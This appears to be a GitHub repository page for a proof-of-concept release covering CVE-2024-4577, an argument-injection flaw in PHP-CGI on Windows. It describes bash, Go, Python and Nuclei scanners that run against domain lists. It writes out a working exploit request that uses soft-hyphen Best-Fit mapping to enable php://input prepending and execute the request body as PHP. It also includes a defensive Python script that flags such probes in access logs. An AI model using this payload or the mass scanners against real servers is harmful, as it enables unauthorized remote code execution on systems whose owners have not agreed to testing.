Associated Vulnerability
Title: Argument Injection in PHP-CGI (CVE-2024-4577)
Description: In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in the command line given to Win32 API functions. The PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to the PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
Description
PHP RCE PoC for CVE-2024-4577 written in bash, go, python and a nuclei template
Topics: cve-2024-4577, pentest, php, poc, rce-exploit, redteam
Readme
# PHP RCE PoC
## CVE-2024-4577: Argument Injection in PHP-CGI
## Overview
This repository contains scripts to check for the CVE-2024-4577 vulnerability, an argument injection issue in PHP-CGI. You can use the provided Bash, Go, and Python scripts to test a list of domains for this vulnerability. I've also released a Nuclei YAML file.
## Usage
### Bash Script
To use the Bash script, run the following command:
```bash
./CVE-2024-4577.sh /path/to/domains-list
```
### Go Script
First, save the Go script to a file named `CVE-2024-4577.go`. To build and run the Go script:
1. Compile the Go script into a binary:
```bash
go build -o CVE-2024-4577 CVE-2024-4577.go
```
2. Execute the binary with the domain list file as an argument:
```bash
./CVE-2024-4577 /path/to/domains-list
```
### Python Script
First, save the Python script to a file named `CVE-2024-4577.py`. To run the Python script:
1. Ensure you have the `requests` library installed:
```bash
pip install requests
```
2. Execute the Python script with the domain list file as an argument:
```bash
python CVE-2024-4577.py /path/to/domains-list
```
3. (Optional) If you want to only print vulnerable hosts:
```bash
python CVE-2024-4577.py /path/to/domains-list --quiet
```
## Proof of Concept (POC) Explained
To manually test for the vulnerability, you can send the following POST request. The `%AD` bytes in the query string are soft hyphens; on an affected Windows code page, Best-Fit mapping turns them into `-`, so PHP-CGI reads `-d allow_url_include=1 -d auto_prepend_file=php://input` as command-line options and executes the request body as PHP:
```http
POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: */*
Content-Length: 19
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php phpinfo(); ?>
```
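As an added example (not part of this repository), the request shape shown above can be turned into a detection over web-server access logs: percent-decode the query string, look for a soft hyphen (0xAD) immediately followed by a PHP CLI option letter, and flag the ini directives the PoC sets. The log lines below are constructed for this demonstration.

```python
"""Flag CVE-2024-4577 style argument-injection probes in access logs."""
import re
from urllib.parse import unquote_to_bytes, urlsplit

SOFT_HYPHEN = 0xAD                      # %AD, Best-Fit mapped to '-' on Windows
OPTION_LETTERS = b"dsnc"                # PHP CLI options worth flagging ('d' sets ini values)
SUSPICIOUS_DIRECTIVES = (b"allow_url_include", b"auto_prepend_file", b"auto_append_file")

# Request field of a Common Log Format line, e.g. "POST /x?y HTTP/1.1"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jun/2024:10:00:01 +0000] "GET /index.php?page=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Jun/2024:10:00:02 +0000] "POST /test.hello?%ADd+allow_url_include%3d1'
    '+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 1024',
    '10.0.0.7 - - [12/Jun/2024:10:00:03 +0000] "GET /a.php?-d+x=1 HTTP/1.1" 200 100',
]


def analyse_target(target: str) -> list:
    """Return a list of findings for one request target (path + query)."""
    findings = []
    query = urlsplit(target).query
    if not query:
        return findings
    # Decode percent-encoding to raw bytes; '+' separates injected "arguments".
    raw = unquote_to_bytes(query)
    for arg in raw.split(b"+"):
        if len(arg) >= 2 and arg[0] == SOFT_HYPHEN and arg[1] in OPTION_LETTERS:
            findings.append("soft-hyphen option injection: -%s" % chr(arg[1]))
    for directive in SUSPICIOUS_DIRECTIVES:
        if directive in raw:
            findings.append("ini override: " + directive.decode())
    return findings


def scan_log(lines) -> list:
    """Return (target, findings) pairs for every log line that looks like a probe."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        found = analyse_target(m.group("target"))
        if found:
            hits.append((m.group("target"), found))
    return hits


if __name__ == "__main__":
    for target, found in scan_log(SAMPLE_LOG):
        print(target, "->", "; ".join(found))
```

A plain `-d` (third sample line) is deliberately not flagged: the CVE-2024-4577 signature is the 0xAD byte that only becomes a hyphen after Best-Fit mapping.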
## Nuclei Template
I've also created a Nuclei template to scan for vulnerable instances. It uses the v3 layout scheme and has been tested in a lab environment:
```bash
nuclei -t CVE-2024-4577.yaml -u <target-url>
```
## Domain List Example
Each entry in the domain list should be prefixed with `http://` or `https://` so the scripts read it correctly.
```
http://example.com
http://testsite.com
http://vulnerablesite.com
```
## Example Output
If a domain is found to be vulnerable, the output will be:
```
http://example.com: Vulnerable
http://vulnerablesite.com: Vulnerable
```
File Snapshot
[4.0K] /data/pocs/3b72e07d704d6f65e92b8e9b07584d15236ad1ef
├── [3.5K] CVE-2024-4577.go
├── [1.7K] CVE-2024-4577.py
├── [1.1K] CVE-2024-4577.sh
├── [1.0K] CVE-2024-4577.yaml
└── [2.3K] README.md
0 directories, 5 files